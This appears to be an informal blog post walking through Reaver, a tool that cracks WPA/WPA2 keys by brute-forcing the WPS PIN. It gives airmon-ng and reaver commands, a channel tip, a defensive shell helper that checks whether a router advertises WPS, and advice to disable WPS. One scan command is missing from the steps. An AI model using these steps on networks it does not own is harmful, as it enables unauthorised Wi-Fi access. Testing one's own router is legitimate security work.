What is it? Well, it's a WPA/WPA2 cracker. It's useful if you want to test YOUR router's security.
How does it work? Well, it uses a weakness in the WPS (Wi-Fi Protected Setup) system that a guy found.
It's well explained here: http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
I tried it on my router and it took 14 hours (exactly 51000 seconds) to crack it.
Why does it take so much time? Well, it started from a really low PIN.
How do you get it working?
It's really easy:
Open a terminal and run as root:
airmon-ng start wlan0
This enables monitor mode on that wireless device (wlan0); the monitor interface is called mon0 below.
Now you need to find the MAC address of your router. How?
Again as root, run:
This command will show you all the wireless devices near you. Take the MAC of YOUR router and then run this (again, as root):
reaver -i mon0 -b 00:01:02:03:04:05 -vv
It will start cracking the key.
To test this tool I used Ubuntu 10.04 with a wireless device that uses the ath5k driver.
If you want more performance, I saw that if you keep airodump-ng mon0 --channel N (with N as your router's channel) open in another terminal, it helps keep mon0 on the right channel, because reaver is not perfect and needs more improvements.
If you see some warning messages like these:
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: MY_ROUTER)
[!] WARNING: Receive timeout occurred
[!] WARNING: Last message not processed properly, reverting state to previous message
you will need to move the wifi device nearer to the router.
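Before spending 14 hours on this, it's worth checking whether your own router even advertises WPS, whether it reports the "AP setup locked" flag (routers that lock after failed PIN attempts stall this kind of test), and which channel it's on for the airodump-ng --channel N trick. This is an added helper, not part of reaver or the original post; it parses text in the layout of iw dev wlan0 scan (an assumption about iw's output format) and the scan text below is constructed, not a real capture:

```shell
#!/bin/sh
# Constructed sample in the layout of `iw dev wlan0 scan` (not a real capture).
# Run the real thing with: iw dev wlan0 scan   (managed mode, not mon0)
SAMPLE_SCAN='BSS 00:01:02:03:04:05(on wlan0)
    SSID: MY_ROUTER
    DS Parameter set: channel 6
    WPS:  * Version: 1.0
          * Wi-Fi Protected Setup State: 2 (Configured)
          * AP setup locked: 0x01
    RSN:  * Version: 1
BSS 66:77:88:99:aa:bb(on wlan0)
    SSID: OTHER
    DS Parameter set: channel 11
    RSN:  * Version: 1
'

# wps_status BSSID SCAN_TEXT
# Prints "<status> <channel>", where status is one of:
#   no-wps      the BSS does not advertise WPS at all
#   wps-open    WPS advertised, no setup-lock flag seen
#   wps-locked  WPS advertised and "AP setup locked: 0x01" present
#   not-found   BSSID does not appear in the scan
wps_status() {
    want=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    printf '%s\n' "$2" | awk -v want="$want" '
        /^BSS / {
            # "BSS <mac>(on wlan0)": strip the "(on ...)" suffix
            split($2, a, "("); cur = tolower(a[1])
            inblock = (cur == want)
            if (inblock) found = 1
            next
        }
        inblock && /DS Parameter set: channel/   { chan = $NF }
        inblock && /WPS:/                        { wps = 1 }
        inblock && /AP setup locked: 0x01/       { locked = 1 }
        END {
            if (!found)      print "not-found -"
            else if (!wps)   print "no-wps " chan
            else if (locked) print "wps-locked " chan
            else             print "wps-open " chan
        }'
}
```

If the answer for your own router is no-wps, the PIN weakness the paper describes does not apply to it; if it is wps-open, disabling WPS in the router's admin page removes the exposure entirely.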
Where do you download this tool? Here: http://code.google.com/p/reaver-wps/
Sorry for my bad English, I'm Italian :p